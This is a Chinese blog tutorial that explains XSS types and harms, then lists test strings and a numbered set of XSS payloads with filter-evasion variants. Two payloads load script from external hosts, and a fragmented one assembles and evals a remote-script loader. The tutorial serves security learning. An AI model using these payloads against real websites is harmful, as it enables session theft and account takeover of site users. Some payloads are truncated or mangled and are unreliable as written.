网络安全零基础之从原理看懂的XSS

最新推荐文章于 2024-05-05 14:07:13 发布

没更新就是没更新

最新推荐文章于 2024-05-05 14:07:13 发布

阅读量608

点赞数

分类专栏：零基础学安全学习思路网络安全技能树文章标签： web安全安全网络安全经验分享 xss

本文链接：https://blog.csdn.net/jazzz98/article/details/131168235

版权

01、XSS 的原理和分类

跨站脚本攻击 XSS(Cross Site Scripting)，为了不和层叠样式表(Cascading Style Sheets，CSS)的缩写混淆

故将跨站脚本攻击缩写为 XSS，恶意攻击者往 Web 页面里插入恶意 Script 代码，当用户浏览该页面时，嵌入 Web 里面的 Script 代码会被执行，从而达到恶意攻击用户的目的，XSS 攻击针对的是用户层面的攻击；

XSS 分为：存储型，反射型，DOM 型 XSS

存储型 XSS：存储型 XSS，持久化，代码是存储在服务器中，如在个人信息或发表文章等地方，插入代码，如果没有过滤或者过滤不严，那么这些代码将储存到数据库中，用户访问该页面的时候出发代码执行，这种 XSS 比较危险，容易造成蠕虫，盗取 Cookie；

反射型 XSS：非持久化，需要欺骗用户自己去点击链接才能触发 XSS 代码(服务器中没有这样的页面和内容)，一般容易出现在搜索页面，反射性 XSS 大多数是用来盗取用户的 Cookie 信息；

DOM 型 XSS:不经过后端，DOM-XSS 漏洞是基于文档对象模型(Document Object Model ,DOM)的一种漏洞，DOM-XSS 是用过 url 传入参数取控制触发的，其实也属于反射型 XSS，DOM 的详解：DOM 文档对象模型；

【一一帮助安全学习，所有资源获取处一一】

①网络安全学习路线

②20 份渗透测试电子书

③安全攻防 357 页笔记

④50 份安全攻防面试指南

⑤安全红队渗透工具包

⑥网络安全必备书籍

⑦100 个漏洞实战案例

⑧安全大厂内部视频资源

⑨历年 CTF 夺旗赛题解析

可能触发 DOM 型 XSS 的属性

document.refererwindow.namelocationinnerHTMLdocumen.write

02、XSS 攻击的危害

1、盗取各类用户账号，如机器登陆账号，用户网银账号，各类管理员账号；2、控制企业数据，包括读取，篡改，添加，删除企业敏感数据的能力；3、盗取企业重要的具有商业价值的资料；4、非法转账；5、强制发送电子邮件；6、网站挂马；7、控制受害者机器向其他网站发起攻击；

03、XSS 的测试语句

在网站是否存在 XSS 漏洞时，应该输入一些标签，如<，>输入后查看网页源代码是否过滤标签，如果没有过滤，很大可能存在 XSS 漏洞。

常用测试语句：<h5>1</h5>

<span>1</span>

可以看到，网站并没有对标签进行过滤；<script>console.log(1);</script>

可以看到，并没有弹出，但是控制台上输出了 1，我们可以确定，确实存在 XSS；

闭合问题：很多时候，在测试 XSS 的时候，想要要考虑到闭合问题，我们首先查看网页的源代码，需要首先判断出来，网站用的时单引号闭合还是双引号闭合；

"><span>x</span><"

'><span>x</span><'

单行注释：

"><span>x</span>//#双斜杠表示注释掉后面的语句

0x04、XSS 攻击语句

输入检测确定标签没有过滤，为了显示漏洞存在，需要插入 XSS 攻击代码；

<script>alert(1)</script><svg onload=alert(1)><a href=javascript:alert(1)><a href='javascript:alert(1)'>aa</a>

复制代码

(1)普通的 XSS JavaScript 注入<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>(2)IMG 标签 XSS 使用 JavaScript 命令<IMG SRC=http://3w.org/XSS/xss.js/>(3)IMG 标签无分号无引号<IMG SRC=javascript:alert('XSS')>(4)IMG 标签大小写不敏感<IMG SRC=JaVaScRiPt:alert('XSS')>(5)HTML 编码(必须有分号)<IMG SRC=javascript:alert("XSS")>(6)修正缺陷 IMG 标签<IMG """><SCRIPT>alert("XSS")</SCRIPT>">(7)formCharCode 标签(计算器)<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>(8)UTF-8 的 Unicode 编码(计算器)<IMG SRC=jav..省略..S')>(9)7 位的 UTF-8 的 Unicode 编码是没有分号的(计算器)<IMG SRC=jav..省略..S')>(10)十六进制编码也是没有分号(计算器)<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>(11)嵌入式标签,将 Javascript 分开<IMG SRC="jav ascript:alert('XSS');">(12)嵌入式编码标签,将 Javascript 分开<IMG SRC="jav ascript:alert('XSS');">(13)嵌入式换行符<IMG SRC="jav ascript:alert('XSS');">(14)嵌入式回车<IMG SRC="jav ascript:alert('XSS');">(15)嵌入式多行注入 JavaScript,这是 XSS 极端的例子<IMG SRC="javascript:alert('XSS')">(16)解决限制字符(要求同页面)

<script>z='document.'</script><script>z=z+'write("'</script><script>z=z+'<script'</script><script>z=z+'src=ht'</script><script>z=z+'tp://ww'</script><script>z=z+'w.shell'</script><script>z=z+'.net/1.'</script><script>z=z+'js></sc'</script><script>z=z+'ript>")'</script><script>eval_r(z)</script>

复制代码